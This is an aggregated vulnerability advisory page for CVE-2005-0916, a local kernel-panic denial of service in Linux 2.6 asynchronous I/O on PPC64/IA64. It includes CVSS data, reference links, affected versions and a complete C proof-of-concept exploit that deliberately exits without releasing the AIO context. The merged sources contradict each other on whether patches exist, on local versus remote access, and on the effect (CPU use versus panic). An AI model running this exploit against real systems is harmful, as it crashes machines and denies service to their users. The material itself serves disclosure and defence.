CVE-2005-0916
CVSS 2.1
Published: 2005-05-02 00:00:00
Last revised: 2008-09-05 16:47:40

[Original] AIO in the Linux kernel 2.6.11 on the PPC64 or IA64 architectures with CONFIG_HUGETLB_PAGE enabled allows local users to cause a denial of service (system panic) via a process that executes the io_queue_init function but exits without running io_queue_release, which causes exit_aio and is_hugepage_only_range to fail.


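[CNNVD] Linux Kernel Local Denial of Service Vulnerability (CNNVD-200505-150)

        A local denial-of-service vulnerability exists in the Linux kernel. It arises because the application cannot correctly manage input/output resources. A local attacker may exploit this vulnerability to cause the affected Linux kernel to consume a large amount of CPU time, denying service to legitimate users.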
        

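- CVSS (Base score)

CVSS score: 2.1 [LOW]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: NONE [no impact on system integrity]
Availability impact: PARTIAL [may cause reduced performance or interrupted access to resources]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]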

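- CPE (Affected platforms and products)

Product and version information (CPE) is not yet available

- OVAL (Technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0916
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0916
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-150
(Official data source) CNNVD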

- Other links and resources

http://linux.bkbits.net:8080/linux-2.6/cset%404248c8c0es30_4YVdwa6vteKi7h_nw
(UNKNOWN)  CONFIRM
http://groups-beta.google.com/group/linux.kernel/browse_thread/thread/13b43bd5783842f6/7ce3c5a514a497ab?q=io_queue_init&rnum=3#7ce3c5a514a497ab
(UNKNOWN)  MISC
http://www.securityfocus.com/bid/12987
(UNKNOWN)  BID  12987
http://www.novell.com/linux/security/advisories/2005_50_kernel.html
(UNKNOWN)  SUSE  SUSE-SA:2005:050

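- Vulnerability information

Linux Kernel Local Denial of Service Vulnerability
Low risk  Other
2005-05-02 00:00:00 2005-10-20 00:00:00
Local
        A local denial-of-service vulnerability exists in the Linux kernel. It arises because the application cannot correctly manage input/output resources. A local attacker may exploit this vulnerability to cause the affected Linux kernel to consume a large amount of CPU time, denying service to legitimate users.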
        

- Advisories and patches

        The vendor has released an upgrade patch that fixes this security issue. The patch is available at:
        http://www.kernel.org/

- Vulnerability information (911)

Linux Kernel PPC64/IA64 (AIO) Local Denial of Service Exploit (EDBID:911)
linux dos
2005-04-04 Verified
0 Daniel McNeil
//
// Proof of Concept by Daniel McNeil
// compile using cc -o aiodio_read aiodio_read.c -laio
//

#define _XOPEN_SOURCE 600
#define _GNU_SOURCE

#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <sys/fcntl.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <sys/stat.h>

#include <libaio.h>

int pagesize;
char *iobuf;
io_context_t myctx;
int aio_maxio = 4;

/*
 * do an AIO DIO read
 */
int do_aio_direct_read(int fd, char *iobuf, int offset, int size)
{
    struct iocb myiocb;
    struct iocb *iocbp = &myiocb;
    int ret;
    struct io_event e;

    io_prep_pread(&myiocb, fd, iobuf, size, offset);
    if ((ret = io_submit(myctx, 1, &iocbp)) != 1) {
        perror("io_submit");
        return ret;
    }

    /* wait for the single submitted request to complete */
    ret = io_getevents(myctx, 1, 1, &e, 0);

    if (ret) {
        struct iocb *iocb = e.obj;
        int iosize = iocb->u.c.nbytes;
        long long loffset = iocb->u.c.offset;

        printf("AIO read of %d at offset %lld returned %ld\n",
               iosize, loffset, (long) e.res);
    }

    return ret;
}

int main(int argc, char *argv[])
{
    char *filename;
    int fd;
    int err;

    filename = "test.aio.file";
    fd = open(filename, O_RDWR|O_DIRECT|O_CREAT|O_TRUNC, 0666);

    /* O_DIRECT needs a page-aligned buffer */
    pagesize = getpagesize();
    err = posix_memalign((void**) &iobuf, pagesize, pagesize);
    if (err) {
        fprintf(stderr, "Error allocating %d aligned bytes.\n",
                pagesize);
        exit(1);
    }
    err = write(fd, iobuf, pagesize);
    if (err != pagesize) {
        fprintf(stderr, "Error ret = %d writing %d bytes.\n",
                err, pagesize);
        perror("");
        exit(1);
    }
    memset(&myctx, 0, sizeof(myctx));
    io_queue_init(aio_maxio, &myctx);
    err = do_aio_direct_read(fd, iobuf, 0, pagesize);
    close(fd);

    /*
     * The process exits without calling io_queue_release(); this is the
     * condition described in the advisory text above.
     */
    printf("This will panic on ppc64\n");
    return err;
}

// milw0rm.com [2005-04-04]
		

- Vulnerability information

15256
Linux Kernel is_hugepage_only_range() Function DoS
Local Access Required, Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- Vulnerability description

Linux Kernel on PPC64 or IA64 architectures contains a flaw that may allow a local or remote denial of service. The issue is triggered when a program using the is_hugepage_only_range() function calls the io_queue_init() function then exits without calling the io_queue_release() function first. This may cause a kernel panic and will result in loss of availability of the system.

- Timeline

2005-03-28 Unknown
2005-04-04 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- Related references

- Vulnerability author

- Vulnerability information

Linux Kernel Asynchronous Input/Output Local Denial Of Service Vulnerability
Failure to Handle Exceptional Conditions 12987
No Yes
2005-04-04 12:00:00 2006-09-05 10:48:00
Daniel McNeil is credited with the discovery of this issue.

- Affected program versions

S.u.S.E. Novell Linux Desktop 9.0
S.u.S.E. Linux Professional 9.3 x86_64
S.u.S.E. Linux Professional 9.3
S.u.S.E. Linux Professional 9.2 x86_64
S.u.S.E. Linux Professional 9.2
S.u.S.E. Linux Professional 9.1 x86_64
S.u.S.E. Linux Professional 9.1
S.u.S.E. Linux Personal 9.3 x86_64
S.u.S.E. Linux Personal 9.3
S.u.S.E. Linux Personal 9.2 x86_64
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1 x86_64
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Enterprise Server 9
Linux kernel 2.6.11 .6
Linux kernel 2.6.11 .5
Linux kernel 2.6.11 -rc4
Linux kernel 2.6.11 -rc3
Linux kernel 2.6.11 -rc2
Linux kernel 2.6.11
+ Red Hat Fedora Core4
Linux kernel 2.6.10 rc2
Linux kernel 2.6.10
+ Red Hat Fedora Core3
+ Red Hat Fedora Core2
+ Trustix Secure Linux 3.0
+ Ubuntu Ubuntu Linux 5.0 4 powerpc
+ Ubuntu Ubuntu Linux 5.0 4 i386
+ Ubuntu Ubuntu Linux 5.0 4 amd64
Linux kernel 2.6.9
Linux kernel 2.6.8 rc3
Linux kernel 2.6.8 rc2
Linux kernel 2.6.8 rc1
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
Linux kernel 2.6.8
+ S.u.S.E. Linux Personal 9.2 x86_64
+ S.u.S.E. Linux Personal 9.2
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
Linux kernel 2.6.7 rc1
Linux kernel 2.6.7
Linux kernel 2.6.6 rc1
Linux kernel 2.6.6
Linux kernel 2.6.5
+ S.u.S.E. Linux Enterprise Server 9
+ S.u.S.E. Linux Personal 9.1 x86_64
+ S.u.S.E. Linux Personal 9.1 x86_64
+ S.u.S.E. Linux Personal 9.1
+ S.u.S.E. Linux Personal 9.1
Linux kernel 2.6.4
Linux kernel 2.6.3
Linux kernel 2.6.2
Linux kernel 2.6.1 -rc2
Linux kernel 2.6.1 -rc1
Linux kernel 2.6.1
Linux kernel 2.6

- Vulnerability discussion

A local denial-of-service vulnerability affects the Linux kernel because it fails to properly manage input/output resources.

A local attacker may leverage this issue to cause an affected Linux kernel to panic, effectively denying service to legitimate users.

- Exploit

The following exploit has been made available:

- Solution

SUSE has released advisory SUSE-SA:2005:050, along with fixes to address various issues in the Linux kernel. Please see the referenced advisory for more information.

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com.


Linux kernel 2.6.11

Linux kernel 2.6.4

Linux kernel 2.6.8

- Related references

 

 
